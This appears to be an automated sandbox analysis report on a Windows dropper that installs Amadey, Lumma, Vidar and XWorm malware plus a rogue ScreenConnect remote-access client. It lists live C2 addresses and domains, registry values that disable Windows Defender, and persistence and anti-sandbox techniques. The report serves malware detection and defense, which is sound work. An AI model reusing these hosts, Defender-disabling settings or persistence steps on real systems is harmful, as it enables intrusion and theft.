Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2024 01:09
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20241007-en
General
-
Target
file.exe
-
Size
2.9MB
-
MD5
744e8a3718a8bccb6c0bfe243c7ac195
-
SHA1
06ad06e208965913a03307439e68f1168027fb89
-
SHA256
9c41a2f71bf50c12c268e61147794c07e5a65642cd2a08235f5dce0ad0cdbc63
-
SHA512
66802302b003b51072a4eba3b81dd4728f88d642a5813d57e402fd4ab23b4f0f6f07f6812380b6c5bc42818c6a6efc32654405c96253befd023c1b26d5286273
-
SSDEEP
49152:DUEL8aWXxxR4zmtHbaTpanQ6A3tOhbDgF5yx3G9RGpelk1+a:DUE4aWXfR4CtHbaTpanQV3UVgF5W3BE
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
Extracted
xworm
86.38.225.54:5353
-
Install_directory
%AppData%
-
install_file
VIRUS101RatPayload.exe
Signatures
-
Amadey family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023cc0-189.dat family_vidar_v7 behavioral2/memory/4936-194-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral2/memory/4936-269-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/5704-1933-0x0000000000400000-0x0000000000416000-memory.dmp family_xworm -
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" f2d99bc583.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection f2d99bc583.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" f2d99bc583.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" f2d99bc583.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" f2d99bc583.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" f2d99bc583.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4252 created 3444 4252 UZAj8wc.exe 56 PID 5732 created 2848 5732 70e25b8f18.exe 49 -
Vidar family
-
Xworm family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF df80c5b067.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 74ea13a73f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bff0f77eae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5fac2d9081.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c405ac4557.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f2d99bc583.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4c8f28811c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 70e25b8f18.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ df80c5b067.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7fec148bf7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 98144bfdcb.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 680 powershell.exe 5024 powershell.exe 5548 powershell.exe 5840 powershell.exe 4324 powershell.exe 7052 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=5176614d-35ed-49aa-b931-b3e8c4d5caf5&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAATEsmPOMyVkOonVeptikfaAAAAAACAAAAAAAQZgAAAAEAACAAAAAJqUYWB1TJpmY4X%2flPQZSr%2bkZlOXIQlwSekpMKFYDGoAAAAAAOgAAAAAIAACAAAAAvT8tY68NM7Da%2fgv4gEHBw60SCX8eTPsJaAGkLtWtPTKAEAAAB0MDU2COdCBFkNi%2fUlavuLZdbNPvKuhKO9xCkovGGrwMa1L0iMrZhUBkvT8x1GyC%2fmn2fXZlQ5U7JmQecl68YxQzm%2bg8kZJy4MDOM4%2bFA34PO%2fUkNwpLi6EspeDvCAgRs8QnDoA%2fFXF%2bZXWk5VJDsOOMe%2fIVSDhW7yW%2bB26AN%2b686v0SCjmtWWwI%2f53SW4C%2fCk8agUVuIh9lPXjktcMMIZrlYgyC14mhxGkQcIFENu5YPItlWYTQYEpVKH9nTx1CcG68DC2mdjG%2b2OqWVxrsY5Hjrldt3%2buK2c0xvVLTj1YtP8i93JQzx7HL6EqhUYb4ascZpg85JM4RLvNZUaRrfLsMhG3TVHcsZsyzgMav%2b4n3PvIEqoPDTkzTYM2v2R6t3xKPUwxHiNo56sASN3ty37tx7VFhzXOlr2SooabzKCY9VvrTmwCFE2XQwQ4lM9ruYB2DQ1Hc9vGGtLjyMQAbGPfrpNktfus2C6aPRIWrY5V4klZOfBlZKLFi2r3PIhQKpmWu8FQGO6Fuoj9wK6X1I1u3tFv84HgAJN1BqJfUxzN38pQI9p0SC79o3DjEjvoj6%2b%2bL5K3EVV187YLk7HoFj%2fr89dzagaLlXDJ62G5A7U8f0W%2bFUMb%2bouFNJddJisYji%2bYNjfLYKpGtauhcyfJYZU2HoOhhR544zRyWzD5zP5ptJeq9%2bEArMmaVS1QJ6BH2UtaBiwpdNpg5KymSK%2fyYjJMxb%2bFtr3CUqRPxyEOqO1nzhlnTxRWA%2fBTY4rNNjF1sGN3xRLzYFMMuC1tp18bI3xXGudj8hVG9c8LI0EMN37ptiXPrSxAdTYkrpwOh%2fftyI9MkYBDKMVmWRfBFO3ocOkN4iYLJlmLqw8KkNOVz5e%2fovxVFPLfKS1zgUJvr5kyUMczk89taYRPw07oVsGQ4x%2bd%2ftxi6S9SfSKsWHcWoGbAZxDjR9PIsnQGpd4Ob6UDMLvyowZ%2fH5c%2b12PAsBNSlARne2v%2bz76%2b9UvbLL1rOND3yrwhxAbCDOxMPI8EQclcg94mnFKxJ2TVP5g6CSZikYk9IvaIFRUpQz0tEknWvWv5EpQF5ym3pYz%2bHP8cMKqD43wtPCL71M1DTBIlDqE4nZcef6OQwk5M5YBKxJYERV5ViiAE8HdxPDTbo%2bTcNmAw5V4YJfEHvAUGm4ATcMp66akiBoAawY81UXx2EYzOAOq8fl823pVL7zdfCbQuMa6A0jkihshLnDCYMk7DDCcMggOE99MVtUmMqLFxhEL3FfMTYzdbQp59HYAj1zg%2bJ2JsgZfVHnpIMgsC1ljxbwnU2WHFTt7H5ZtQHDMKp02%2bf%2b84JWqn80k5%2b3VAUMO2OA3Sjcp8CQe1Va67Tnj44DIz21raZag6bttoo7MBze9OZs%2f9TqrUdJh0NA14Dq0Pbb9x1XyKzy0guN9s6mH7SnIMMlwCAYYgDtlSfOExpFuZHmofTuppcrN1opsYlrSBnQ5kWb3KBxYCVt3J95VFsAu9oVQcFz5Y4v7eQpqQKeKooT6mszkqM4hywYS5LlugDx%2fSOUlkKAWoncx07P%2f2NO9HKEKt8yukkFXIHZFM0BbYy%2b2UAAAADWlnF7kE3MfQp7BR0bB8%2bPGZOECXbbThcZG2szhRoCw5hs3mw7fNt6UQCkY3sIVNIxJlSnh%2bfqDvnj8vGWWuSj&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c405ac4557.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5fac2d9081.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 70e25b8f18.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 70e25b8f18.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion df80c5b067.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5fac2d9081.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 98144bfdcb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7fec148bf7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bff0f77eae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f2d99bc583.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f2d99bc583.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4c8f28811c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion df80c5b067.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4c8f28811c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 74ea13a73f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bff0f77eae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 74ea13a73f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7fec148bf7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c405ac4557.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 98144bfdcb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation NN9Dd7c.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 11330f815f134a4cbe5bb3c2715f831b.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation UZAj8wc.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 1759409732.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 9140c03f1375498d9cf519530df567a1.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation efa7459f98b841dcbf8cc6e8b586c1a6.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 996031bb21.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation ga70pjP.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 9852e08b3ce14c9f8e5ee5c68d6659c7.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation f5ccfe7cf7.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApproximateSize.vbs UZAj8wc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIRUS101RatPayload.lnk InstallUtil.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIRUS101RatPayload.lnk InstallUtil.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 51 IoCs
pid Process 2700 skotes.exe 4828 NN9Dd7c.exe 544 ga70pjP.exe 4936 11330f815f134a4cbe5bb3c2715f831b.exe 3932 9852e08b3ce14c9f8e5ee5c68d6659c7.exe 3008 INOKWGC.exe 1492 8ZVMneG.exe 2044 8ZVMneG.exe 4252 UZAj8wc.exe 5516 74ea13a73f.exe 4632 82f750008c.exe 5008 82f750008c.exe 5416 df80c5b067.exe 5096 ScreenConnect.ClientService.exe 5164 ScreenConnect.WindowsClient.exe 4808 ScreenConnect.WindowsClient.exe 836 7fec148bf7.exe 4328 c405ac4557.exe 3020 skotes.exe 5188 0200dc27b8.exe 4728 2cd8483345.exe 216 2cd8483345.exe 5524 e77a85cbca.exe 5528 1759409732.exe 5980 bff0f77eae.exe 4332 efa7459f98b841dcbf8cc6e8b586c1a6.exe 5328 9140c03f1375498d9cf519530df567a1.exe 6104 5fac2d9081.exe 4240 0200dc27b8.exe 6848 72ca34675a.exe 6060 f2d99bc583.exe 7108 4c8f28811c.exe 6468 f5ccfe7cf7.exe 4512 7z.exe 724 7z.exe 1180 7z.exe 3044 7z.exe 6500 7z.exe 4456 7z.exe 5312 7z.exe 3272 7z.exe 208 in.exe 5352 98144bfdcb.exe 5732 70e25b8f18.exe 6624 996031bb21.exe 5260 skotes.exe 312 Intel_PTT_EK_Recertification.exe 2280 1dfd96b4d6.exe 5760 4166e6a446b1425caaeb6333ae0f6c18.exe 7116 1dfd96b4d6.exe 5668 1dfd96b4d6.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine f2d99bc583.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 98144bfdcb.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 74ea13a73f.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine df80c5b067.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 7fec148bf7.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine c405ac4557.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine bff0f77eae.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 5fac2d9081.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 4c8f28811c.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 70e25b8f18.exe -
Loads dropped DLL 30 IoCs
pid Process 772 MsiExec.exe 4696 rundll32.exe 4696 rundll32.exe 4696 rundll32.exe 4696 rundll32.exe 4696 rundll32.exe 4696 rundll32.exe 4696 rundll32.exe 4696 rundll32.exe 4696 rundll32.exe 5872 MsiExec.exe 5308 MsiExec.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 5096 ScreenConnect.ClientService.exe 4512 7z.exe 724 7z.exe 1180 7z.exe 3044 7z.exe 6500 7z.exe 4456 7z.exe 5312 7z.exe 3272 7z.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features f2d99bc583.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" f2d99bc583.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\74ea13a73f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1018024001\\74ea13a73f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bff0f77eae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1018066001\\bff0f77eae.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5fac2d9081.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1018067001\\5fac2d9081.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\72ca34675a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1018068001\\72ca34675a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f2d99bc583.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1018069001\\f2d99bc583.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 411 raw.githubusercontent.com 26 raw.githubusercontent.com 27 raw.githubusercontent.com 28 raw.githubusercontent.com 232 raw.githubusercontent.com 233 raw.githubusercontent.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023df5-4120.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\rt4q5qlv.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\rt4q5qlv.tmp ScreenConnect.ClientService.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 4408 file.exe 2700 skotes.exe 5516 74ea13a73f.exe 5416 df80c5b067.exe 836 7fec148bf7.exe 4328 c405ac4557.exe 3020 skotes.exe 5980 bff0f77eae.exe 6104 5fac2d9081.exe 6060 f2d99bc583.exe 7108 4c8f28811c.exe 5352 98144bfdcb.exe 5732 70e25b8f18.exe 5260 skotes.exe 5760 4166e6a446b1425caaeb6333ae0f6c18.exe 5760 4166e6a446b1425caaeb6333ae0f6c18.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1492 set thread context of 2044 1492 8ZVMneG.exe 119 PID 4632 set thread context of 5008 4632 82f750008c.exe 146 PID 4252 set thread context of 5704 4252 UZAj8wc.exe 161 PID 4728 set thread context of 216 4728 2cd8483345.exe 167 PID 5188 set thread context of 4240 5188 0200dc27b8.exe 192 PID 312 set thread context of 6596 312 Intel_PTT_EK_Recertification.exe 265 PID 2280 set thread context of 5668 2280 1dfd96b4d6.exe 275 -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File created C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File created C:\Windows\Installer\SourceHash{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD} msiexec.exe File opened for modification C:\Windows\Installer\MSI50EA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5197.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5C56.tmp msiexec.exe File opened for modification C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\skotes.job file.exe File opened for modification C:\Windows\Installer\e584fb1.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e584fb1.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\e584fb3.msi msiexec.exe -
